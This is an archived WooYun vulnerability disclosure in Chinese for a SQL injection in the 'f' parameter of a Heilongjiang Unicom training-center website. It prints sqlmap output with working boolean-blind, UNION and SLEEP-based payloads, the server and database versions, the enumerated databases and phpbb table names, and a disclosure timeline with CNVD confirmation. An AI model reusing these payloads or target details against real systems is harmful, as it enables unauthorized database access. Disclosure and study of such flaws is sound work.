乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-09-09: 细节已通知厂商并且等待厂商处理中 2014-09-14: 厂商已经确认,细节仅向厂商公开 2014-09-24: 细节向核心白帽子及相关领域专家公开 2014-10-04: 细节向普通白帽子公开 2014-10-14: 细节向实习白帽子公开 2014-10-24: 细节向公众公开
联通3
黑龙江联通_培训中心http://www.itscholar.com/
随便打开一个培训信息
输入'
报错注入点http://www.itscholar.com/itsviewtopic.php?f=21&t=1722网页打开比较慢但跑数据比较快
注入点http://www.itscholar.com/itsviewtopic.php?f=21&t=1722
GET parameter 'f' is vulnerable. Do you want to keep testing the others (if any)? [y/N] nsqlmap identified the following injection points with a total of 49 HTTP(s) requests:---Place: GETParameter: f Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: f=21 AND 6390=6390&t=1722 Type: UNION query Title: MySQL UNION query (NULL) - 3 columns Payload: f=-6364 UNION ALL SELECT NULL,CONCAT(0x716c647771,0x736a6545726a6f4c6267,0x716b6d6671),NULL#&t=1722 Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: f=21 AND SLEEP(5)&t=1722---
web server operating system: Linux Debian 4.0 (etch)web application technology: Apache 2.2.3, PHP 5.2.0back-end DBMS: MySQL 5.0.11
数据库
available databases [7]:[*] debian-sys-maint[*] information_schema[*] mysql[*] phpbb[*] test[*] wbdiscuz[*] wbtest
随便看一个数据库的表
Database: phpbb[62 tables]+----------------------------+| phpbb_acl_groups || phpbb_acl_options || phpbb_acl_roles || phpbb_acl_roles_data || phpbb_acl_users || phpbb_attachments || phpbb_banlist || phpbb_bbcodes || phpbb_bookmarks || phpbb_bots || phpbb_config || phpbb_confirm || phpbb_disallow || phpbb_drafts || phpbb_extension_groups || phpbb_extensions || phpbb_forums || phpbb_forums_access || phpbb_forums_track || phpbb_forums_watch || phpbb_groups || phpbb_icons || phpbb_lang || phpbb_log || phpbb_moderator_cache || phpbb_modules || phpbb_poll_options || phpbb_poll_votes || phpbb_posts || phpbb_privmsgs || phpbb_privmsgs_folder || phpbb_privmsgs_rules || phpbb_privmsgs_to || phpbb_profile_fields || phpbb_profile_fields_data || phpbb_profile_fields_lang || phpbb_profile_lang || phpbb_ranks || phpbb_reports || phpbb_reports_reasons || phpbb_search_results || phpbb_search_wordlist || phpbb_search_wordmatch || phpbb_sessions || phpbb_sessions_keys || phpbb_sitelist || phpbb_smilies || phpbb_styles || phpbb_styles_imageset || phpbb_styles_imageset_data || phpbb_styles_template || phpbb_styles_template_data || phpbb_styles_theme || phpbb_topics || phpbb_topics_posted || phpbb_topics_track || phpbb_topics_watch || phpbb_user_group || phpbb_users || phpbb_warnings || phpbb_words || phpbb_zebra |+----------------------------+
危害等级:中
漏洞Rank:10
确认时间:2014-09-14 12:07
CNVD确认并复现所述情况,已经转由CNCERT下发给黑龙江分中心,由其后续协调网站管理单位处置。
暂无